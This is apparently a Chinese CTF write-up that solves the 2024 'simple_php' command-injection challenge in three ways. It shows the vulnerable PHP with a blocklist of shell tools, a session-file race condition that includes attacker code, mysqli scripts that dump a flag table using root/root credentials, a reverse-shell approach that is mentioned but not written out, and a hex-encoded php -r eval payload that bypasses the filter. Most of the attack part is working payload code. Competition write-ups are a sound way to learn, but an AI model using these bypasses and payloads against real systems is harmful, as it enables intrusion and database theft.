国赛2024 simple_php(三种方法)

<?php
ini_set('open_basedir', '/var/www/html/');
error_reporting(0);

if(isset($_POST['cmd'])){
  $cmd = escapeshellcmd($_POST['cmd']);
   if (!preg_match('/ls|dir|nl|nc|cat|tail|more|flag|sh|cut|awk|strings|od|curl|ping|\*|sort|ch|zip|mod|sl|find|sed|cp|mv|ty|grep|fd|df|sudo|more|cc|tac|less|head|\.|{|}|tar|zip|gcc|uniq|vi|vim|file|xxd|base64|date|bash|env|\?|wget|\'|\"|id|whoami/i', $cmd)) {
     system($cmd);
}
}

show_source(__FILE__);
?>

题目如上过滤了很多

方法一:

经过测试发现可以利用session文件包含

意思就是你传一个post请求包

他会生成一个临sess_+时文件

文件名即为/sess_+PHPSESSID值

临时文件在/tmp/sess_aaaa下

系统会删除这个文件

我们要在它删除之前去访问它(条件竞争)

直接post传cmd=php /tmp/sess_aaaa

两个文件同时去发包

在构建的post包123处写上想要执行的代码即可

<?php system('ls /');?>

执行后没找到flag

怀疑在数据库中

利用php脚本去链接数据库

<?php
// 建立连接
$conn = new mysqli("localhost", "root", "root");

// 检查连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}

// 查询所有数据库名
$sql = "SHOW DATABASES";
$result = $conn->query($sql);

// 输出数据库名
if ($result->num_rows > 0) {
    while($row = $result->fetch_assoc()) {
        echo "数据库名：" . $row["Database"] . "<br>";
    }
} else {
    echo "未找到数据库。";
}

// 关闭连接
$conn->close();
?>

成功

并且发现可疑数据库

继续查表

<?php
// 数据库连接信息
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "PHP_CMS";

// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);

// 检查连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}

// 查询所有表名
$sql = "SHOW TABLES";
$result = $conn->query($sql);

// 输出表名
if ($result->num_rows > 0) {
    echo "数据库 " . $dbname . " 中的表名：<br>";
    while($row = $result->fetch_assoc()) {
        echo $row["Tables_in_PHP_CMS"] . "<br>";
    }
} else {
    echo "该数据库中没有表。";
}

// 关闭连接
$conn->close();
?>

发现可疑表F1ag_Se3Re7

接着去查表中内容

<?php
// 数据库连接信息
$servername = "localhost";
$username = "root";
$password = "root";
$dbname = "PHP_CMS";

// 创建连接
$conn = new mysqli($servername, $username, $password, $dbname);

// 检查连接
if ($conn->connect_error) {
    die("连接失败: " . $conn->connect_error);
}

// 查询 F1ag_Se3Re7 表中的内容
$sql = "SELECT * FROM F1ag_Se3Re7";
$result = $conn->query($sql);

// 输出内容
if ($result->num_rows > 0) {
    echo "F1ag_Se3Re7 表中的内容：<br>";
    while($row = $result->fetch_assoc()) {
        // 输出每行数据
        foreach ($row as $key => $value) {
            echo $key . ": " . $value . "<br>";
        }
        echo "<br>";
    }
} else {
    echo "F1ag_Se3Re7 表中没有数据。";
}

// 关闭连接
$conn->close();
?>

得到flag

ctfshow{2c8541c2-ad6e-42a5-93c1-fe2e2fb1243c}

方法二:

和方法一类似

前提是你需要有一个服务器(我的服务器出了些问题就不演示了,有什么难点可以找我讨论)

还是用上面的方法

直接去反弹shell(反弹shell的命令网上有,用php的)

方法三:

这里的环境是比赛时的环境

过滤比较多

但还可以利用php -r

后面用编码绕过

目录中没有flag怀疑在数据库中

接下来连接数据库执行命令

先查库

<?php

$a="echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;'`;";

$b=bin2hex($a);

echo $b;

?>

结果:6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b27603b

查表

再查表中内容

<?php

$a="echo `mysql -u root -p'root' -e 'use PHP_CMS;show tables;select * from F1ag_Se3Re7;'`;";

$b=bin2hex($a);

echo $b;

?>

即可

cmd=php -r eval(hex2bin(substr(s6563686f20606d7973716c202d7520726f6f74202d7027726f6f7427202d652027757365205048505f434d533b73686f77207461626c65733b73656c656374202a2066726f6d20463161675f5365335265373b27603b,1)));

也可得到flag